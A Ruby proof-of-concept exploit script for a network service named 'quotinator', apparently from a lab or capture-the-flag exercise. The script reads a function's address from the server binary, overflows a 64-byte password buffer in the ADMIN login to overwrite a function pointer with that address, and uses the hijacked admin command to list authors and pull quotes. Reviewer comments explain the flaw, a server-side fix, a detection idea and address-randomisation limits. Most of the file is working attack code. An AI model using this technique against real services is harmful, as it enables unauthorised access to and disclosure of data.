#!/usr/bin/ruby

require 'socket'

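# Proof-of-concept client for the ADMIN login of the "quotinator" service.
#
# What the script does, as far as this file shows:
#   1. Looks up the address of the `admin_authors_command` symbol in a local
#      copy of the server binary with `nm`.
#   2. Sends an ADMIN login whose password field is BUFFER_SIZE filler bytes
#      followed by that address packed as 4 little-endian bytes.
#   3. Reads one reply line, sends QUIT, parses the next line as a count,
#      reads that many lines as author names and requests one quote for each.
#
# NOTE(review): the server source is not part of this file. The payload layout
# and the name `fcn_ptr` suggest the server copies the password into a 64-byte
# buffer without a length check and later calls through a pointer stored right
# after it -- confirm against the server code. If that is the case, the fix is
# on the server: bound the copy to the buffer size and reject over-long fields
# in the command parser. For detection, an ADMIN password longer than the
# protocol allows, or one carrying non-printable bytes, is worth logging.
#
# NOTE(review): using the symbol's address from the file as its runtime
# address only holds when the binary is loaded at a fixed base; a
# position-independent build mapped at a randomized base would not match.

if ARGV.length < 3
    puts "Usage: exploit.rb <host> <port> <quotinator>\n\n"
    puts "Example: exploit.rb 127.0.0.1 6666 /var/services/TheQuotinator/quotinator\n"
    exit
end

# Number of filler bytes placed in front of the address in the password field.
BUFFER_SIZE = 64
# Symbol whose address is appended to the filler.
TARGET_SYMBOL = 'admin_authors_command'

host = ARGV[0]
port = ARGV[1].to_i
binary_path = ARGV[2]

# Run nm with an argument vector rather than a shell string: the path comes
# straight from the command line, and interpolating it into backticks would
# let spaces or shell metacharacters in it change the command that runs.
begin
    symbol_table = IO.popen(['nm', binary_path], &:read)
rescue SystemCallError => e
    abort "exploit.rb: cannot run nm: #{e.message}"
end

# An nm line for a defined symbol is "<address> <type> <name>". Match the name
# exactly instead of by substring so a longer symbol containing the same text
# cannot be picked up by accident.
addresses = symbol_table.each_line
                        .map(&:split)
                        .select { |fields| fields.size == 3 && fields[2] == TARGET_SYMBOL }
                        .map(&:first)
                        .uniq

# Stop with a readable message instead of an Integer() backtrace when the
# symbol is absent (e.g. a stripped binary) or ambiguous.
unless addresses.size == 1
    abort "exploit.rb: expected exactly one #{TARGET_SYMBOL} in #{binary_path}, found #{addresses.size}"
end

fcn_ptr = Integer(addresses.first, 16)

# "V" packs a 32-bit unsigned little-endian integer, i.e. exactly 4 bytes.
password = 'A' * BUFFER_SIZE + [fcn_ptr].pack('V')

begin
    authors = []
    # Block form closes the socket on every exit path, including exceptions.
    TCPSocket.open(host, port) do |s|
        s.write("ADMIN \"user\" \"#{password}\"\r\n")
        s.gets # Read the "login failed" message
        s.write("QUIT\r\n")
        # The line after QUIT is parsed as the number of author lines to read.
        count = s.gets.to_i
        count.times { authors << s.gets.chop }
        authors.each do |author|
            s.write("QUOTE \"#{author}\" 1\r\n")
            puts s.gets.chop
        end
    end
    exit 0
rescue StandardError => e
    # Report the failure instead of swallowing it; the exit status stays 1.
    warn "exploit.rb: #{e.class}: #{e.message}"
end
exit 1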
